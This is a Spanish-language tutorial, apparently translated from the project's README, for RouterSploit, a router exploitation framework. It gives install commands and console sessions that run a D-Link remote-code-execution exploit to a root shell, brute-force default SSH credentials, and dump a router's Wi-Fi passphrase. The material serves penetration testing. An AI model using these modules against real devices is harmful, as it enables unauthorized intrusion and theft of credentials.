RouterSploit es un completo framework que nos permitirá comprobar la seguridad de nuestros routers, puntos de acceso, NAS y otros dispositivos embebidos. Este framework es completamente gratuito y de código libre, por lo que podremos modificarlo para que cumpla con nuestras necesidades.
Se compone de varios módulos que realizan pruebas de pruebas de penetración:
Exploits: Es el módulo encargado de explotar las vulnerabilidades encontradas en un dispositivo, como por ejemplo un router.
Creds: Es un módulo diseñado específicamente para probar credenciales por defecto de un router, e intentar entrar directamente en su administración.
Scanners: Es un módulo diseño para buscar y encontrar objetivos vulnerables, al reconocer un objetivo, nos mostrará si es vulnerable a algún exploit que tengamos en el módulo de Exploits.Instalación
requisitos
- gnureadline (sólo OSX)
- peticiones
- paramiko
- beautifulsoup4
- pysnmp
La instalación en Kali
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
Instalación en Ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/reverse-shell/routersploit
cd routersploit
pip install -r requirements.txt
./rsf.py
Instalación en OSX
git clone https://github.com/reverse-shell/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt
./rsf.py
Que se ejecuta en acoplable
git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh
Actualizar
Actualización RouterSploit Marco menudo. El proyecto se encuentra en fase de desarrollo pesado y nuevos módulos se envían casi todos los días.
cd routersploit
git pull
Uso
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `–. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ ‘__|`–. \ ‘_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams
Version : 1.0.0
- Los exploits
Escoja el módulo
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
Puede utilizar la tecla de tabulación para su conclusión.
opciones
Opciones del módulo de visualización:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
Name Current settings Description
—- —————- ———–
target Target address e.g. http://192.168.1.1
port 80 Target Port
Determinar las opciones:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {‘target’: ‘http://192.168.1.1’}
módulo de ejecutar
Puede explotar el objetivo mediante la emisión de la ‘carrera’ o ‘explotar’ comando:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop…
cmd > whoami
root
También es posible comprobar si el objetivo es vulnerable a explotar en particular:
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable
información
Mostrar información acerca de explotar:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show info
Name:
D-LINK DIR-300 & DIR-600 RCE
Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.
Devices:
– D-Link DIR 300
– D-Link DIR 600
Authors:
– Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
– Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module
References:
– http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
– http://www.s3cur1ty.de/home-network-horror-days
– http://www.s3cur1ty.de/m1adv2013-003
- Creds
recoger módulo
Módulos ubicados en el creds/directorio permite la ejecución ataques de diccionario contra varios servicios de red.
Los siguientes servicios que actualmente son compatibles:
- ftp
- ssh
- telnet
- http autenticación básica
- HTTP Digest autenticación
- forma http auth
- SNMP
Cada servicio se ha dividido en dos módulos:
- por defecto (por ejemplo ssh_default) – este tipo de módulos utilice una lista de palabras con las credenciales predeterminadas combinaciones de usuario: contraseña. El módulo puede ser utilizado de forma rápida y en cuestión de segundos puede verificar si el dispositivo utiliza las credenciales predeterminadas.
- fuerza bruta (por ejemplo ssh_bruteforce) – este tipo de módulos de realizar ataques de diccionario contra una cuenta o una lista de cuentas especificadas. Se necesitan dos parámetros: usuario y contraseña. Estos valores pueden ser una sola palabra (por ejemplo ‘admin’) o una lista completa de las cadenas (archivo: ///root/users.txt).

Consola:
rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
opciones
rsf (SSH Default Creds) > show options
Target options:
Name Current settings Description
—- —————- ———–
target Target IP address
port 22 Target port
Module options:
Name Current settings Description
—- —————- ———–
threads 8 Numbers of threads
defaults file:///root/git/routersploit/routersploit/wordlists/defaults.txt User:Pass or file with default credentials (file://)
Poner un objectivo:
rsf (SSH Default Creds) > set target 192.168.1.53
[+] {‘target’: ‘192.168.1.53’}
rsf (SSH Default Creds) > run
[*] Running module…
[*] worker-0 process is starting…
[*] worker-1 process is starting…
[*] worker-2 process is starting…
[*] worker-3 process is starting…
[*] worker-4 process is starting…
[*] worker-5 process is starting…
[*] worker-6 process is starting…
[*] worker-7 process is starting…
[-] worker-4 Authentication failed. Username: ‘3comcso’ Password: ‘RIP000’
[-] worker-1 Authentication failed. Username: ‘1234’ Password: ‘1234’
[-] worker-0 Authentication failed. Username: ‘1111’ Password: ‘1111’
[-] worker-7 Authentication failed. Username: ‘ADVMAIL’ Password: ‘HP’
[-] worker-3 Authentication failed. Username: ‘266344’ Password: ‘266344’
[-] worker-2 Authentication failed. Username: ‘1502’ Password: ‘1502’
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
—– ——–
admin 1234
rsf (SSH Default Creds) >
- Escáneres
Escáneres le permiten verificar rápidamente si el objetivo es vulnerable a cualquier hazañas.
recoger módulo
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
opciones
Name Current settings Description
—- —————- ———–
target Target address e.g. http://192.168.1.1
port 80 Target port
Poner un objectivo:
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {‘target’: ‘192.168.1.1’}
módulo de ejecutar
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
– exploits/dlink/dwr_932_info_disclosure
Se ha comprobado que el objetivo es vulnerable a dwr_932_info_disclosure explotar. Ahora usa el módulo adecuado y explotar diana.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {‘target’: ‘192.168.1.1’}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module…
[*] Decoding JSON value
[+] Exploit success
Parameter Value
——— —–
get_wps_enable 0
wifi_AP1_enable 1
get_client_list 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0
wifi_AP1_ssid dlink-DWR-932
get_mac_address c4:00:f5:00:ec:40
wifi_AP1_security_mode 3208,8
wifi_AP1_hidden 0
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
Licencia
El Marco RouterSploit está bajo una licencia BSD. Por favor, vea LICENCIA para más detalles.
DESCARGA:
https://github.com/reverse-shell/routersploit






